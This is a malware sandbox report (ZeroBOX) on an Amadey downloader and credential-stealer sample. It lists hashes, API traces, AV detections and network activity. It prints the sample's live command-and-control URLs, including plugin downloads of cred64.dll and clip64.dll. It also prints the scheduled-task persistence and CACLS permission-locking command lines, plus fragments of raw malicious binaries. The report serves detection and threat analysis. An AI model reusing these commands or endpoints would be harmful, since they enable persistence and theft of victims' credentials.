popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Amadey.exe

Browser Login Data Stealer Amadey Malicious Library Admin Tool (Sysinternals etc ...) UPX Malicious Packer PE64 PE File DLL OS Processor Check JPEG Format PE32
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Sept. 30, 2023, 12:53 p.m. Sept. 30, 2023, 1:03 p.m.
Size 226.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 aebaf57299cd368f842cfa98f3b1658c
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
CRC32 ACEB78BF
ssdeep 6144:k5tErvkeLE0X7J7bhi1g6FKVu+dnX9ys8l+:CYkeg0Nbh6FKu+dnX
PDB Path D:\Mktmp\Amadey\Release\Amadey.pdb
Yara
  • Malicious_Library_Zero - Malicious_Library
  • UPX_Zero - UPX packed file
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)
  • Malicious_Packer_Zero - Malicious Packer
  • OS_Processor_Check_Zero - OS Processor Check

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
193.42.32.29 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: SUCCESS: The scheduled task "nhdues.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: N
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0
pdb_path D:\Mktmp\Amadey\Release\Amadey.pdb
file C:\Program Files\Mozilla Firefox\firefox.exe
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
Save+0x8d973 Main-0x1478d cred64+0x91e43 @ 0x7fef2c51e43
Save+0x8f58b Main-0x12b75 cred64+0x93a5b @ 0x7fef2c53a5b
Save+0x90613 Main-0x11aed cred64+0x94ae3 @ 0x7fef2c54ae3
Save+0x909bf Main-0x11741 cred64+0x94e8f @ 0x7fef2c54e8f
Save+0xa1ae8 Main-0x618 cred64+0xa5fb8 @ 0x7fef2c65fb8
Main+0x65 cred64+0xa6635 @ 0x7fef2c66635
rundll32+0x2f42 @ 0xff522f42
rundll32+0x3b7a @ 0xff523b7a
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76fd652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x776ec521

exception.instruction_r: 42 38 3c 00 75 f7 48 8b d0 48 8d 4c 24 50 e8 fa
exception.instruction: cmp byte ptr [rax + r8], dil
exception.exception_code: 0xc0000005
exception.symbol: Save+0x8d973 Main-0x1478d cred64+0x91e43
exception.address: 0x7fef2c51e43
registers.r14: 0
registers.r15: 0
registers.rcx: 1099511627775
registers.rsi: 0
registers.r10: 668
registers.rbx: 0
registers.rsp: 2227264
registers.r11: 2222160
registers.r8: 0
registers.r9: 231940292619
registers.rdx: 4436816
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1
registers.r13: 0
1 0 0
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://193.42.32.29/9bDc8sQ/index.php
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://193.42.32.29/9bDc8sQ/index.php?scr=1
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://193.42.32.29/9bDc8sQ/Plugins/cred64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://193.42.32.29/9bDc8sQ/Plugins/clip64.dll
request POST http://193.42.32.29/9bDc8sQ/index.php
request POST http://193.42.32.29/9bDc8sQ/index.php?scr=1
request GET http://193.42.32.29/9bDc8sQ/Plugins/cred64.dll
request GET http://193.42.32.29/9bDc8sQ/Plugins/clip64.dll
request POST http://193.42.32.29/9bDc8sQ/index.php
request POST http://193.42.32.29/9bDc8sQ/index.php?scr=1
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2248
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7343f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2248
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x746e0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2248
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73451000
process_handle: 0xffffffff
1 0 0
description nhdues.exe tried to sleep 141 seconds, actually delayed analysis time by 141 seconds
file C:\Users\test22\AppData\Roaming\a967e0f403b652\cred64.dll
file C:\Users\test22\AppData\Roaming\a967e0f403b652\clip64.dll
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "test22:N"&&CACLS "nhdues.exe" /P "test22:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "test22:N"&&CACLS "..\1ff8bec27e" /P "test22:R" /E&&Exit
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
file C:\Users\test22\AppData\Roaming\a967e0f403b652\clip64.dll
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: cmd
parameters: /k echo Y|CACLS "nhdues.exe" /P "test22:N"&&CACLS "nhdues.exe" /P "test22:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "test22:N"&&CACLS "..\1ff8bec27e" /P "test22:R" /E&&Exit
filepath: cmd
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\a967e0f403b652\cred64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\a967e0f403b652\clip64.dll, Main
filepath: rundll32.exe
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $‘vÕtOÕtOÕtOŽpNÇtOŽwNÞtOŽqNetOzqNtOzpNÚtOzwNÜtOŽuNØtOÕuOktONy}NÑtONytNÔtONy‹OÔtONyvNÔtORichÕtOPEd†«í•dð" X Î €p`€úXØúŒ@ø¼Pøà(pP)p Ð.textxW X  `.rdataþžp  \ @@.data¼u<ü@À.pdata¼ž8@@_RDATA”0Ö@@.rsrcø@Ø@@.relocøPÚ@BHƒì(A¸ H—H À*è3o H L7 HƒÄ(éoò ÌÌÌHƒì(A¸ HH 0/èo H Œ7 HƒÄ(é?ò ÌÌÌHƒì(A¸HƒH à/èÓn H Ì7 HƒÄ(éò ÌÌÌHƒì(A¸ H_H +è£n H 8 HƒÄ(éßñ ÌÌÌHƒì(A¸HWH €.èsn H L8 HƒÄ(é¯ñ ÌÌÌHƒì(A¸H?H P)èCn H Œ8 HƒÄ(éñ ÌÌÌHƒì(E3ÀHhH ã.èn H Ï8 HƒÄ(éRñ ÌÌÌÌÌÌHƒì(E3ÀHâgH /èæm H 9 HƒÄ(é"ñ ÌÌÌÌÌÌHƒì(E3ÀH²gH C*è¶m H O9 HƒÄ(éòð ÌÌÌÌÌÌHƒì(E3ÀH‚gH S(è†m H 9 HƒÄ(éÂð ÌÌÌÌÌÌHƒì(A¸HoH  (èSm H Ì9 HƒÄ(éð ÌÌÌHƒì(A¸HOH Ð/è#m H : HƒÄ(é_ð ÌÌÌHƒì(A¸H/H €-èól H L: HƒÄ(é/ð ÌÌÌHƒì(A¸HH P'èÃl H Œ: HƒÄ(éÿï ÌÌÌHƒì(A¸HïH à(è“l H Ì: HƒÄ(éÏï ÌÌÌHƒì(A¸ HßH °*ècl H ; HƒÄ(éŸï ÌÌÌHƒì(A¸H¿H  *è3l H L; HƒÄ(éoï ÌÌÌHƒì(A¸H›H )èl H Œ; HƒÄ(é?ï ÌÌÌHƒì(A¸HwH à)èÓk H Ì; HƒÄ(éï ÌÌÌHƒì(A¸H_H +è£k H < HƒÄ(éßî ÌÌÌHƒì(A¸ H?H ,èsk H L< HƒÄ(é¯î ÌÌÌHƒì(A¸LHH p(èCk H Œ< HƒÄ(éî ÌÌÌHƒì(A¸H?H À%èk H Ì< HƒÄ(éOî ÌÌÌHƒì(A¸dH/H P-èãj H = HƒÄ(éî ÌÌÌHƒì(A¸HgH ,è³j H L= HƒÄ(éïí ÌÌÌHƒì(A¸HOH ð)èƒj H Œ= HƒÄ(é¿í ÌÌÌHƒì(A¸ H?H @%èSj H Ì= HƒÄ(éí ÌÌÌHƒì(A¸ HH p*è#j H > HƒÄ(é_í ÌÌÌHƒì(A¸(HÿH )èói H L> HƒÄ(é/í ÌÌÌHƒì(A¸ HÿH P+èÃi H Œ> HƒÄ(éÿì ÌÌÌHƒì(A¸ HßH À,è“i H Ì> HƒÄ(éÏì ÌÌÌHƒì(A¸H¿H Ð)èci H ? HƒÄ(éŸì ÌÌÌHƒì(A¸HŸH +è3i H L? HƒÄ(éoì ÌÌÌHƒì(A¸ HH °&èi H Œ? HƒÄ(é?ì ÌÌÌHƒì(A¸,HoH `'èÓh H Ì? HƒÄ(éì ÌÌÌHƒì(A¸HoH p&è£h H @ HƒÄ(éßë ÌÌÌHƒì(A¸ H_H à)èsh H L@ HƒÄ(é¯ë ÌÌÌHƒì(A¸$H?H 0*èCh H Œ@ HƒÄ(éë ÌÌÌHƒì(A¸H7H @'èh H Ì@ HƒÄ(éOë ÌÌÌHƒì(A¸HH P"èãg H A HƒÄ(éë ÌÌÌHƒì(A¸HH €'è³g H LA HƒÄ(éïê ÌÌÌHƒì(A¸ HÿH p$èƒg H ŒA HƒÄ(é¿ê ÌÌÌHƒì(A¸ HßH @(èSg H ÌA HƒÄ(éê ÌÌÌHƒì(A¸ H×H P%è#g H B HƒÄ(é_ê ÌÌÌHƒì(A¸ HoH  "èóf H LB HƒÄ(é/ê ÌÌÌHƒì(A¸HŸH °$èÃf H ŒB HƒÄ(éÿé ÌÌÌHƒì(A¸H‡H "è“f H ÌB HƒÄ(éÏé ÌÌÌHƒì(A¸ HgH p(ècf H C HƒÄ(éŸé ÌÌÌHƒì(A¸LHÿH à$è3f H LC HƒÄ(éoé ÌÌÌHƒì(A¸HH Ð$èf H ŒC HƒÄ(é?é ÌÌÌHƒì(A¸dHÿH €%èÓe H ÌC HƒÄ(éé ÌÌÌHƒì(A¸HÇH 0(è£e H D HƒÄ(éßè ÌÌÌHƒì(A¸H¯H 'èse H LD HƒÄ(é¯è ÌÌÌHƒì(A¸ H—H $èCe H ŒD HƒÄ(éè ÌÌÌHƒì(A¸HwH À!èe H ÌD HƒÄ(éOè ÌÌÌHƒì(A¸HOH °'èãd H E HƒÄ(éè ÌÌÌHƒì(A¸H'H  #è³d H LE HƒÄ(éïç ÌÌÌHƒì(A¸HÿH "èƒd H ŒE HƒÄ(é¿ç ÌÌÌHƒì(A¸HßH ` èSd H ÌE HƒÄ(éç ÌÌÌHƒì(A¸?HH °#è#d H F HƒÄ(é_ç ÌÌÌH iF éPç ÌÌÌÌH ÉF é@ç ÌÌÌÌH )G é0ç ÌÌÌÌH ‰G é ç ÌÌÌÌH éG éç ÌÌÌÌHƒì(E3ÀH¢]H “è¦c H /H HƒÄ(éâæ ÌÌÌÌÌÌH ‰H éÐæ ÌÌÌÌH éH éÀæ ÌÌÌÌH II é°æ ÌÌÌÌH ©I é æ ÌÌÌÌ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $,CyáCyáCyáâ~Iyáä~Ëyáå~Qyá–å~Lyá–â~Ryá–ä~byáà~FyáCyàyáØè~@yáØá~ByáØByáØã~ByáRichCyáPEL­í•dà! ތ>ð°@0IœÌI<€øT°=p >@ð,.textVÝÞ `.rdata~`ðbâ@@.dataD` D@À.rsrcø€P@@.relocTR@Bj h¨<¹phè?#hêèŒ*YÃÌÌÌjhÉ<¹ˆhè#h`êèl*YÃÌÌÌjhÉ<¹ hèÿ"hÀêèL*YÃÌÌÌjhÉ<¹¸hèß"h ëè,*YÃÌÌÌjhÉ<¹Ðhè¿"h€ëè *YÃÌÌÌjhÉ<¹èhèŸ"hàëèì)YÃÌÌÌjhÉ<¹iè"h@ìèÌ)YÃÌÌÌjhÉ<¹iè_"h ìè¬)YÃÌÌÌj?h=¹0iè?"híèŒ)YÃÌÌ̋ÁÂÌÌÌÌÌÌÌÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPèÂ2ƒÄ‹Æ^]ÂÌÌ̋I¸|<…ÉEÁÃÌÌU‹ìV‹ñFÇ”ñPèó2ƒÄöEt j Vè«%ƒÄ‹Æ^]AÇ”ñPèÉ2YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀ‹ÁfÖAÇA<ÇìñÃÌÌÌÌÌÌÌÌU‹ìƒì MôèÒÿÿÿhIEôPè›2ÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPèò1ƒÄÇìñ‹Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPè²1ƒÄÇ ñ‹Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìQS‹ZVWQS‹ñè‹=€h3É3À‰}ü…Û~53Ò;NjþEЃ=„h¸phCphƒ~r‹>ŠˆA‹}üB;Ë|˃~r‹_Æ‹Æ^[‹å]Ã_Æ‹Æ^[‹å]ÃÌÌÌÌÌU‹ìƒìSVW‹ò‹ùQ‰}ô‹FP‰Eðè“3ۉ]ø9]ðŽ)Dƒ~‹Ær‹¾Pè¯KƒÄ…Àu-‹N‹Æƒùr‹€< t‹Æƒùr‹ƒ‹Ïr‹Šé̃~‹Ær‹‹=@i3ҋ Di…ÿt+ŠˆEÿfDŠ]ÿƒù¸0iC0i8‹]øtB;×ráƒÊÿ‹E‹Èƒxr‹3À…ÿt.Š ˆMÿDƒ=Di¹0iŠ]ÿC 0i8‹]øt@;Çr݃Èÿƒ=Di¹0iC 0i‰Mì‹Mô‰Møƒyr‹ ‰Mø‹Ï+ȍ 3Ò÷÷‹Mì‹}ôŠ ‹MøˆC‰]ø;]ðŒÜþÿÿƒr‹Æ‹Ç_^[‹å]ÃÆ‹Ç_^[‹å]ÃÌÌÌÌÌÌÌÌÌÌU‹ìƒì@SVW‹Ù‹òQMĉ]ôèçýÿÿEċÖPMÜèYþÿÿhÇCÇCÆè°"‹Ø¹ƒÈÿ‰]ø‹ûƒÄ ó«3Ò„¾ŠÐ<‰‹Bƒú@|ð‹Uì3ö3ۍ~ø…ÒtA‹Møƒ}ðEÜCEܾ‹ƒøÿt'ÁæðƒÇx‹Ï‹ÆÓø‹MôPè‹Uìƒï‹MøC;Úr‹Eø…ÀthPèð!ƒÄ‹Uðƒúr(‹MÜB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwVRQèÀ!ƒÄ‹UØÇEìÇEðÆE܃úr(‹MÄB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQè~!ƒÄ‹Eô_^[‹å]Ãè›GÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì4‹E0SVW3ÿÆEè¾…À„‹]ÇEàÇEäÆEÐ;Ç‚´+ǍMÐ;ÃB؃}4E CE SÇPèƒþr.‹MèV‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡hRQè× ƒÄMЃ}Uó~EàEèCUƒ}ä‹uà‹]f~ÉMèCÁfÖEø;óu\ƒîr‹; uƒÀƒÂƒîsïƒþü„îŠ: u7ƒþý„ߊH:Ju&ƒþþ„ΊH:Juƒþÿ„½Š@:B„±‹E0G‹uü;ø‚õþÿÿ3ÿ‹Uƒþr/‹MèF‹Áþr‹IüƒÆ#+ÁƒÀüƒø‡’VQè ‹UƒÄ‹Eƒør'H‹Âùr‹RüƒÁ#+ƒÀüƒøw`QRèσċU4ÇEÇEÆEƒúr3‹M B‹Áúr‹IüƒÂ#+ÁƒÀüƒøwë ‹uüGéWÿÿÿRQ肃ċÇ_^[‹å]Ãè Eè«ÌÌÌÌÌÌÌÌÌÌÌU‹ìQS‹]V‹ñ‰]üWjhÉ<ÇFÇFÆèD3ÿ…Û~1ƒ}ECEŠ8S¿C €ú¶È¶ÃGȶÁ‹ÎPèG;}ü|ϋUƒúr(‹MB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQèуÄ_‹Æ^[‹å]ÃèïDÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì0VWj$hX=MÐÇEàÇEäÆEÐè—‹E…Àu3öéÇ3ÿ…À„¸ÇEøÇEüÆEè;Ç‚F+ǹ;ÁBȃ}ECEQǍMèPèBƒìEЋÌPètƒìEè‹ôƒì‹ÌPèa‹ÎèªþÿÿƒÄè¢üÿÿ‹UüƒÄ0…À„šƒúr,‹MèB‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡¹RQèǃċEG;ø‚Hÿÿÿ¾‹Uäƒúr(‹MÐB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwxRQ膃ċUƒúr^‹MB‹ÁúrF‹IüƒÂ#+ÁƒÀüƒøwHë4ƒúr(‹MèB‹Áúr‹IüƒÂ#+ÁƒÀüƒøw#RQè1ƒÄ3öétÿÿÿRQè ƒÄ_‹Æ^‹å]Ãè?CèJÌÌÌÌÌÌÌÌÌÌU‹ìQ‹E‹U‹MV…À„‚S@WPè] ƒÄMƒ}‹Ø‹ÓCM+ъIˆD ÿ„Àuó‹óNŠF„Àuù+ñFVjÿðV‹øSWÿðPèÇ5ƒÄ WÿðjÿñÿñWjÿñÿ ñ‹U‹M_[^ƒúr%B‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQèAƒÄ‹å]ÃèdBÌÌÌÌU‹ìƒì$SVW‹ùjÇGÇGÆÿñ…À„‡j ÿ$ñ‹Ø‰]ü…Û„lSÿð‰Eô…À„SjjjjjÿPjhéýÿ ð‹ð‰uø…öŽ.‹WN;Êw‰O‹Çƒr‹ÆëF‹G‹Ù+Ú+Â;Øw%ƒ‹Ç‰Or‹S4jVèE,ÆƒÄ ‹uøëQSÆEø‹ÏÿuøS訋]üƒ‹Çr‹jjVPjÿÿuô
request_handle: 0x00cc000c
1 1 0
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
host 193.42.32.29
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
Time & API Arguments Status Return Repeated

RegSetValueExA

 key_handle: 0x00000320
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
value: 0
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
1 0 0
cmdline CACLS "nhdues.exe" /P "test22:R" /E
cmdline CACLS "nhdues.exe" /P "test22:N"
cmdline CACLS "..\1ff8bec27e" /P "test22:N"
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "test22:N"&&CACLS "nhdues.exe" /P "test22:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "test22:N"&&CACLS "..\1ff8bec27e" /P "test22:R" /E&&Exit
cmdline cmd /k echo Y|CACLS "nhdues.exe" /P "test22:N"&&CACLS "nhdues.exe" /P "test22:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "test22:N"&&CACLS "..\1ff8bec27e" /P "test22:R" /E&&Exit
cmdline CACLS "..\1ff8bec27e" /P "test22:R" /E
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.Agent.Y!c
Elastic Windows.Trojan.Amadey
MicroWorld-eScan Gen:Variant.Zusy.446510
CAT-QuickHeal Trojan.GenericPMF.S30511625
McAfee Downloader-FCND!AEBAF57299CD
Malwarebytes Spyware.Amadey
Sangfor Trojan.Win32.Save.a
K7AntiVirus Trojan ( 005a7a4a1 )
Alibaba TrojanDownloader:Win32/Amadey.410f7ab9
K7GW Trojan ( 005a7a4a1 )
Cybereason malicious.3425e8
Arcabit Trojan.Zusy.D6D02E
BitDefenderTheta Gen:NN.ZexaF.36738.ouW@amc4G5pi
Cyren W32/Amadey.C1.gen!Eldorado
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win32/TrojanDownloader.Amadey.A
Cynet Malicious (score: 100)
APEX Malicious
ClamAV Win.Malware.Doina-10001799-0
Kaspersky HEUR:Trojan-Spy.Win32.Stealer.gen
BitDefender Gen:Variant.Zusy.446510
Avast Win32:BotX-gen [Trj]
Tencent Win32.Trojan.Agen.Zimw
Emsisoft Gen:Variant.Zusy.446510 (B)
F-Secure Heuristic.HEUR/AGEN.1319380
DrWeb Trojan.DownLoader46.21896
VIPRE Gen:Variant.Zusy.446510
TrendMicro Trojan.Win32.AMADEY.YXDI3Z
McAfee-GW-Edition BehavesLike.Win32.Downloader.dh
Trapmine suspicious.low.ml.score
FireEye Generic.mg.aebaf57299cd368f
Sophos Mal/Amadey-C
Ikarus Win32.Outbreak
Avira HEUR/AGEN.1319380
Antiy-AVL Trojan[Downloader]/Win32.Amadey
Kingsoft malware.kb.a.995
Gridinsoft Trojan.Win32.Amadey.bot
Microsoft Trojan:Win32/Wacatac.B!ml
ZoneAlarm HEUR:Trojan-Spy.Win32.Stealer.gen
GData Win32.Trojan-Downloader.Amadey.D
Google Detected
AhnLab-V3 Malware/Win.Trojanspy.C5238800
ALYac Gen:Variant.Zusy.446510
MAX malware (ai score=86)
Cylance unsafe
Panda Trj/Genetic.gen
TrendMicro-HouseCall Trojan.Win32.AMADEY.YXDI3Z
Rising Spyware.Agent!8.C6 (TFE:5:Be6eNfNv8YM)
SentinelOne Static AI - Malicious PE